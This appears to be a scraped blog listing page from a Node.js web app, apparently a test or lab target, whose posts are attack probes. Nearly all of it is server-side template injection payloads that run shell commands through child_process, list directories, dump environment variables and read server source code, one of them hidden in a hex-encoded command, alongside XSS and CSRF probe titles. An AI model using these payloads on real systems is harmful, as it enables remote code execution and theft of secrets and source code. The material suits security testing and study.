Blogs
SSTI Test <%= 7*7 %> {{ 7*7 }} #{ 7*7 }
SSTI Content Test
SSTI_Content_v2
CSRF_Final
SSTI_Probe_1
XSS_Probe_1
<%= 7*7 %>
Attacker Post
XSS Test
SSTI Attempt
Click Me
<%= 7*7 %>
SSRF Test
<%= process.mainModule.require('child_process').execSync('id').toString() %>
<%= settings['view engine'] %>
<%= process.cwd() %>
<%= process.mainModule.require('fs').readdirSync('.').join(',') %>
Read File
<%= Object.getOwnPropertyNames(this).join(',') %>
<%= ''.sub.constructor('return process.env')() %>
<%= global.process ? 'process_exists' : 'no_process' %>
Replication <%= 8*8 %>
Definitive <%= 5*5 %>
Server Source
<%= process.mainModule.require('child_process').execSync('cat server.js | base64 -w 0').toString() %>
Listing:
<%= process.mainModule.require('fs').readdirSync('.').join(',') %>
<%= process.mainModule.require('fs').readdirSync('public').join(',') %>
File Listing
Exploit Hex
<%= process.mainModule.require('child_process').execSync(Buffer.from('68656164202d6e203230207365727665722e6a73', 'hex').toString()) %>
<%= process.mainModule.require('child_process').execSync('id').toString() %>
Sum: <%= 1+1 %>
Env: <%= ''.sub.constructor('return process.env')() %>
Definitive <%= 5*5 %>
Home
Blogs
|
Login
|
Register
|
Dashboard
|
Logout